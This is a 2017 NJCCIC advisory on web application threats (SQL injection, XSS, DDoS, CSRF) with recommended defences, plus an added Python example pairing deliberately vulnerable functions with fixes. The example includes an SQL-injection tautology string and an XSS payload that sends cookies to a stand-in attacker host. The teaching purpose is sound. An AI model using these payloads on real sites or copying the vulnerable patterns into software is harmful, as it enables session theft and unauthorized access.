June 21, 2017
TLP: WHITE | The NJCCIC assesses with high confidence that many organizations, in both the public and private sectors, continue to operate web applications (apps) and servers that are vulnerable to exploitation or attacks that could result in unauthorized access, disruption of services, theft of customer information, or manipulation of data. Web apps are often exposed to the internet with a front end that is open to the public or available to authorized users via a website, which makes them susceptible to external threats and difficult to protect, given the need to ensure their accessibility. In many cases, web apps are targeted opportunistically due to software vulnerabilities, limited or absent defensive measures, or poor authentication requirements. While web-based threats cannot be eliminated, the risk of successful exploits or attacks can be reduced by implementing web application firewalls, two-factor authentication, and other best practices.
- According to Verizon’s 2017 Data Breach Investigations Report, there were 6,502 security incidents involving web apps in 2016, and web apps remained the most prevalent vector for data breaches, with 571 instances of confirmed data disclosure. More recently, Symantec reported that its software blocked over 1.2 million web attacks in the month of May, a 22 percent increase from April and the highest monthly volume observed since November 2015.
Examples of Web App Threats
- Structured Query Language injection (SQLi) is one of the most common web app threats. It occurs when input supplied through a web app (a form field, URL parameter, cookie, or header) is concatenated directly into an SQL query instead of being passed as a bound parameter, allowing a malicious actor to change the logic of the query. If successful, the actor could read or modify data in the database, bypass authentication, execute administrative database functions, and, depending on the database configuration, issue commands to the underlying operating system.
- Cross-site scripting (XSS) occurs when a website includes untrusted input in a page without proper output encoding, allowing a malicious actor to deliver a script that executes in a different end user’s browser with that site’s privileges. An XSS script can read cookies and session tokens (unless they are marked HttpOnly), capture other sensitive user information, perform actions as the user, or rewrite the content of the HTML page. XSS vulnerabilities in websites are widespread.
- Distributed denial-of-service (DDoS) attacks are intended to render a website or application unresponsive, preventing users from accessing the site to do business or purchase items. They are typically conducted using botnets to generate traffic from tens or hundreds of thousands of devices that overwhelms the targeted system, ultimately degrading or disrupting its service and denying access to users.
- Cross-site request forgery (CSRF or XSRF), also known as session riding, is when a malicious actor causes a logged-in user’s browser to send a request the user did not intend, typically from an attacker-controlled page. Because the browser automatically attaches the user’s session cookie, the web app treats the forged request as legitimate unless it also requires something the attacker cannot obtain, such as an anti-CSRF token. Using CSRF, a hacker could change a victim’s credentials or conduct fraudulent financial transactions, among other actions.
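The following is an added example, not code from the NJCCIC advisory, that shows the SQLi, XSS, and CSRF items above in working form: for each, a vulnerable server-side pattern sits next to the standard mitigation (bound query parameters, HTML output encoding, and a session-bound anti-CSRF token). It uses only the Python standard library; the user table, the attacker inputs, the session identifier, and the server secret are all constructed for illustration.

```python
# Added example (not part of the NJCCIC advisory). Three web app threats,
# each as a vulnerable function beside its mitigation. All data is constructed.
import hmac
import html
import secrets
import sqlite3


def make_db():
    """In-memory users table with two constructed accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "correct horse", "admin"),
                    ("bob", "hunter2", "user")])
    return db


# --- SQL injection -----------------------------------------------------------
def login_vulnerable(db, name, password):
    """Builds the query by string formatting, so input becomes part of the SQL.
    A password of  ' OR '1'='1  turns the WHERE clause into a tautology."""
    q = (f"SELECT name FROM users WHERE name = '{name}' "
         f"AND password = '{password}'")
    return [row[0] for row in db.execute(q)]


def login_safe(db, name, password):
    """Bound parameters: the driver sends values separately from the query
    text, so input can never alter the query's structure."""
    q = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in db.execute(q, (name, password))]


# --- Cross-site scripting ----------------------------------------------------
def render_comment_vulnerable(comment):
    """Interpolates user text straight into HTML; a <script> tag will run in
    every visitor's browser."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """HTML-encodes the text for an element-body context, so the browser
    displays the payload as text instead of executing it."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# --- Cross-site request forgery ----------------------------------------------
# Constructed server secret; a real deployment loads it from protected config.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token bound to the session via HMAC. The server embeds it in its own
    forms; a page on another origin cannot read it, so it cannot forge one."""
    return hmac.new(SERVER_SECRET, session_id.encode(), "sha256").hexdigest()


def transfer_funds_vulnerable(session, form):
    """Trusts the session cookie alone: any site can make the victim's
    browser submit this request with the cookie attached."""
    return {"ok": True, "to": form["to"], "amount": form["amount"]}


def transfer_funds_safe(session, form):
    """Rejects state-changing requests whose token does not match the
    session; the comparison is constant-time to avoid timing leaks."""
    expected = issue_csrf_token(session["id"])
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return {"ok": False, "error": "missing or invalid CSRF token"}
    return {"ok": True, "to": form["to"], "amount": form["amount"]}


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("SQLi vulnerable:", login_vulnerable(db, "alice", payload))
    print("SQLi safe:      ", login_safe(db, "alice", payload))
    xss = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
    print("XSS vulnerable:", render_comment_vulnerable(xss))
    print("XSS safe:      ", render_comment_safe(xss))
    session = {"id": "sess-123"}
    forged = {"to": "attacker", "amount": 1000}
    print("CSRF vulnerable:", transfer_funds_vulnerable(session, forged))
    print("CSRF safe:      ", transfer_funds_safe(session, forged))
```

The XSS mitigation shown encodes for an HTML element body only; text placed inside an attribute, a URL, or a JavaScript block needs the encoding rules for that context, which is why templating engines with context-aware auto-escaping are preferred over manual escaping. The CSRF token shown is deterministic per session; pairing it with SameSite cookie attributes adds a second, browser-enforced layer.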
The NJCCIC strongly recommends the use of web application firewalls (WAFs) to protect web servers and individual apps, or sets of apps, from web-based threats. WAFs can be network-based or host-based, and can analyze Application Layer (Layer 7) traffic to and from a web server or app to defend against known threats, such as those listed above, as well as buffer overflow, session hijacking, and others. WAFs may also defend against unknown threats by identifying and blocking anomalous behavior. In addition to deploying WAFs, the following measures are recommended:
- Implement the OWASP secure coding practices to mitigate the most common software vulnerabilities.
- Require two-factor authentication for access to all systems and apps that store sensitive or confidential data.
- Limit or eliminate the storage of unnecessary personal information or credentials within web apps.
- Encrypt any data that could be of value to malicious actors, both at rest and in transit.
- Ensure all software, particularly content management systems and plugins, is kept up to date with the latest security patches and, if possible, set to install updates automatically.
- Discontinue the use of any unnecessary software, as well as software no longer supported by the vendor.
- Perform regular scanning and testing of web apps to identify potential input validation weaknesses.
Traffic Light Protocol: WHITE information may be distributed without restriction.